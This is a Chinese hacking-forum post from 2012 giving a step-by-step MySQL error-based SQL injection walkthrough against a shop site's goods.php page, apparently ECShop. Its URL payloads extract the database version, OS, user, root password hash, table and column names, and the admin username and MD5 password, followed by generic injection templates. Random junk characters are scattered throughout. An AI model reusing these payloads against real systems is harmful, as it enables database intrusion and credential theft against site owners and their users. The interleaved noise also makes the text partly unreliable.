找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2221|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 * h6 l8 e: y2 x3 e: ^! o/ T% \
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 n: E( i3 @9 z7 T4 C1 k# A# t+ ^! E! C
判断系统
. ^- [4 l% O1 K$ ?- g+ b8 `, j9 B+ y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' a) E( d" @3 {2 S8 g7 b, l& W' Z1 E( E6 H; T
1 v5 U5 ~+ Z. ]: X& E
/ Q7 A' l- S9 m. {8 Q
当前 user()9 U- Z* s7 E2 P6 h1 Q" ]

" r; |0 {" H6 e6 {* ehttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%235 y4 s% x; U: A- n( {: |
4 @% X* r* K* }* u

  A: H' g' n+ Z9 Z$ u" }6 O7 c$ l0 T3 }( o1 z- E3 D; I6 z
当前 database()6 [6 E  T! ]  h7 T4 V. I( v6 [
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
$ ~2 f& ]& }5 W& c
: T, F1 q0 A  @$ H) U/ k  r/ R. C  b2 ?. q

. N- v3 R8 A2 B  f, @7 n& O1 ^
5 \5 z& o* _6 groot hash) Y* k7 p+ W7 x2 y( x1 V- P

0 K, h! g2 i1 j2 O1 Ihttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
  Q+ e8 l/ }* d" {8 j( `
  m* y! M" C+ x$ c4 m+ S2 V
8 X' v, U4 [! h+ X- o9 R5 [
3 X( ^6 l  _4 L6 Z+ q* ]当前 数据库表名% @( c  t, \8 D; ^, L1 Y

. H9 @  ^9 I4 D$ M. y1 d$ [3 z5 fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%236 j1 J& [3 t) Q( h3 o, M3 G

' `0 C- M2 K9 \9 G9 X+ n5 [7 l. X; e# S" p; l3 ]

6 J7 ~) A1 f! f" X当前 数据库 user_name 字段
& f& e0 {" i2 M  j7 h
6 j- X7 U1 z9 H& E5 }0 D& b7 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
4 E# y1 h1 M# A! w' z' d3 T
* }! ?0 M5 Z; B# n当前 数据库 字段 password( c6 U9 [: r6 Y: M$ f% \( `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23; u2 c. O9 R' R/ T
, L" X7 c" N: b' [. n2 v) f" W
' X0 J1 t3 C  t+ @- N0 s' M
- |$ I4 o: e7 i* }: Y
获得 admin passwd(md5)* k4 ?+ }. \5 m$ s5 c

4 m4 P0 D, Z1 l& E0 |0 T& x
: K; s% g' V) O; b& _http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
" p* b9 a( t0 f, E: ]: r7 ^8 ?* K  V, q  H& `2 X
报错注射
! \  S$ O8 Y( S/ E% z  g4 w! ISELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)) J5 R! V- f6 F2 p1 L$ k
. t0 M8 e" a% B* I
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
, f+ X! c8 f9 u$ \8 T) x2 I3 B! T8 s/ j/ I( o
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表